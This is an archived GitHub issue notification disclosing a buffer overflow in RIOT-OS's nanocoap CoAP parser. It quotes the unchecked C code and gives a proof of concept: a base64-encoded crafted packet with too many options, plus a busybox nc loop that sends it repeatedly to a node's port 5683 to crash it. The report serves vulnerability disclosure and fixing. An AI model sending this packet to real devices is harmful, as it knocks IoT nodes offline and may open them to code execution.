[riot-notifications] [RIOT-OS/RIOT] nanocoap: options buffer overflow (#10753)

nmeum notifications at github.com
Fri Jan 11 10:11:01 CET 2019


#### Description

nanocoap contains a buffer overflow which has been introduced with
commit dee793d29f09bafa83bb2c9fe293eb7b16fc009a. The bug allows an
attacker to overflow the `options` buffer in the `coap_pkt_t` supplied
to `coap_parse`.

The relevant code part is the following:

```C
if (option_delta) {
        optpos->opt_num = option_nr;
        optpos->offset = (uintptr_t)option_start - (uintptr_t)hdr;
        DEBUG("optpos option_nr=%u %u\n", (unsigned)option_nr, (unsigned)optpos->offset);
        optpos++;
        option_count++;
}
```

`optpos` is a pointer to the `options` buffer in the `coap_pkt_t`. This
pointer is incremented without checking if it exceeds
`NANOCOAP_NOPTS_MAX` (the size of the buffer). It also used to write a
new option at the current position in the `options` buffer.

To trigger this buffer overflow an attacker can send a CoAP request
containing more than `NANOCOAP_NOPTS_MAX` options to a nanocoap server.
This may allow an attacker to crash the nanocoap server and cause a
denial of service. Additionally, a clever attacker might also be able to
use this for a remote code execution.

#### Steps to reproduce the issue

A malicious CoAP packet triggering this vulnerability can be send to a RIOT
node in order to crash it. I created a malicious packet containing 42 which
should successfully crash native.

To test this build `examples/nanocoap_server` and send the crafted
malicious packet to it. For example:

```
$ echo QAEJJgEXERcRFxEXERcRFxEXERcRFxEXERcRFxEXERcRFxEXERcRFxEXERcRFxEXERcRFxEXERcRFxEXERcRFxEXERcRFxEXERcRFxEXERcRFxEXERcRFw== > crash
$ while sleep 1; do busybox nc -u '[ip-address]' 5683 -e base64 -d crash; done
```

---

I personally prefer full disclosure for reporting such issues. Especially since #10749 hasn't been resolved yet. I also believe that doing full disclosure including documentation of an exploit worked quite well to get #10739 fixed in time. Besides, I didn't want to sit on this any longer and full disclosure is way better than no disclosure at all.

-- 
You are receiving this because you are subscribed to this thread.
Reply to this email directly or view it on GitHub:
https://github.com/RIOT-OS/RIOT/issues/10753
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.riot-os.org/pipermail/notifications/attachments/20190111/0e22b4b8/attachment.html>


More information about the notifications mailing list